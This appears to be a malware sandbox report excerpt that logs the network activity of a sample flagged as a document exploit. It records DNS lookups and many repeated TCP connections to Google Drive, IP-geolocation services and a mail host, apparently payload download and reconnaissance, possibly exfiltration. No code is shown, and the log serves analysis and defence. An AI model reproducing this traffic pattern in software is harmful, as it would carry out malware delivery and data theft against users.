Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 104.26.12.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 208.95.112.1:80
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 208.95.112.1:80
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 208.95.112.1:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
